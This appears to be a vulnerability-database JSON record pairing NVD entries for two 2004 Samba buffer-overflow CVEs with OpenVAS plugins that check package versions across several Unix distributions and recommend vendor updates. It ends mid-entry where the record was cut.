{"id": "OPENVAS:65033", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES9: Security update for samba", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "published": "2009-10-10T00:00:00", "modified": "2017-07-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=65033", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "lastseen": "2017-07-26T08:55:49", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-26T08:55:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0686", "CVE-2004-0600"]}, {"type": "openvas", "idList": ["OPENVAS:54628", "OPENVAS:835144", "OPENVAS:136141256231065033", "OPENVAS:53922", "OPENVAS:136141256231053922", "OPENVAS:52420", "OPENVAS:1361412562310835144"]}, {"type": "slackware", "idList": ["SSA-2004-207-01"]}, {"type": "gentoo", "idList": ["GLSA-200407-21"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6530", "SECURITYVULNS:DOC:6545"]}, {"type": "redhat", "idList": ["RHSA-2004:404", "RHSA-2004:259"]}, {"type": "nessus", "idList": ["SUSE_SA_2004_022.NASL", "GENTOO_GLSA-200407-21.NASL", "REDHAT-RHSA-2004-259.NASL", "REDHAT-RHSA-2004-404.NASL", "SAMBA_3_0_5.NASL", "SAMBA_MANGLING_OVERFLOW.NASL", "MANDRAKE_MDKSA-2004-071.NASL", "SLACKWARE_SSA_2004-207-01.NASL", "FREEBSD_SAMBA_304_4.NASL", "FREEBSD_PKG_2DE14F7ADAD911D8B59A00061BC2AD93.NASL"]}, {"type": "freebsd", "idList": ["2DE14F7A-DAD9-11D8-B59A-00061BC2AD93"]}, {"type": "suse", "idList": ["SUSE-SA:2004:022"]}, {"type": "exploitdb", "idList": ["EDB-ID:364"]}, {"type": "samba", "idList": ["SAMBA:CVE-2004-0686", "SAMBA:CVE-2004-0600"]}, {"type": "osvdb", "idList": ["OSVDB:8191", "OSVDB:8190"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:33855"]}], "modified": "2017-07-26T08:55:49", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "65033", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016221.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for samba\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65033);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for samba\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.0.4~1.27\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}

{"cve": [{"lastseen": "2021-02-02T05:22:58", "description": "Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.", "edition": 4, "cvss3": {}, "published": "2004-07-27T04:00:00", "title": "CVE-2004-0600", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0600"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.0.4", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.2a"], "id": "CVE-2004-0600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0600", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:22:58", "description": "Buffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the \"mangling method = hash\" option is enabled in smb.conf, has unknown impact and attack vectors.", "edition": 4, "cvss3": {}, "published": "2004-07-27T04:00:00", "title": "CVE-2004-0686", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0686"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.4", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.2a"], "id": "CVE-2004-0686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:56:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "Check for the Version of the CIFS Server", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835144", "href": "http://plugins.openvas.org/nasl.php?oid=835144", "type": "openvas", "title": "HP-UX Update for the CIFS Server HPSBUX01062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for the CIFS Server HPSBUX01062\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote root access.\";\ntag_affected = \"the CIFS Server on\n HP-UX B.11.00, B.11.11, B.11.22, B.11.23 running the CIFS Server version \n A.01.11.01 and previous.\";\ntag_insight = \"A potential security vulnerability has been identifiedwith HP-UX running the \n CIFS Server where a buffer overflow may allow a remote user to gain root \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00916390-1\");\n script_id(835144);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"01062\");\n script_cve_id(\"CVE-2004-0686\", \"CVE-2004-0600\");\n script_name( \"HP-UX Update for the CIFS Server HPSBUX01062\");\n\n script_summary(\"Check for the Version of the CIFS Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065033", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065033", "type": "openvas", "title": "SLES9: Security update for samba", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016221.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for samba\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n samba-winbind\n samba\n samba-python\n libsmbclient\n libsmbclient-devel\n samba-client\n samba-pdb\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016221 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65033\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for samba\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.0.4~1.27\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "Check for the Version of the CIFS Server", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835144", "type": "openvas", "title": "HP-UX Update for the CIFS Server HPSBUX01062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for the CIFS Server HPSBUX01062\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote root access.\";\ntag_affected = \"the CIFS Server on\n HP-UX B.11.00, B.11.11, B.11.22, B.11.23 running the CIFS Server version \n A.01.11.01 and previous.\";\ntag_insight = \"A potential security vulnerability has been identifiedwith HP-UX running the \n CIFS Server where a buffer overflow may allow a remote user to gain root \n access.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00916390-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835144\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"01062\");\n script_cve_id(\"CVE-2004-0686\", \"CVE-2004-0600\");\n script_name( \"HP-UX Update for the CIFS Server HPSBUX01062\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of the CIFS Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CIFS-Server\", revision:\"A.01.11.02\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53922", "href": "http://plugins.openvas.org/nasl.php?oid=53922", "type": "openvas", "title": "Slackware Advisory SSA:2004-207-01 new samba packages", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_207_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-207-01\";\n \nif(description)\n{\n script_id(53922);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-207-01 new samba packages \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"samba\", ver:\"3.0.5-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200407-21.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54628", "href": "http://plugins.openvas.org/nasl.php?oid=54628", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200407-21 (Samba)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two buffer overflows vulnerabilities were found in Samba, potentially\nallowing the remote execution of arbitrary code.\";\ntag_solution = \"All Samba users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=net-fs/samba-3.0.5'\n # emerge '>=net-fs/samba-3.0.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200407-21\nhttp://bugs.gentoo.org/show_bug.cgi?id=57962\nhttp://www.samba.org/samba/whatsnew/samba-3.0.5.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200407-21.\";\n\n \n\nif(description)\n{\n script_id(54628);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200407-21 (Samba)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-fs/samba\", unaffected: make_list(\"ge 3.0.5\"), vulnerable: make_list(\"le 3.0.4-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 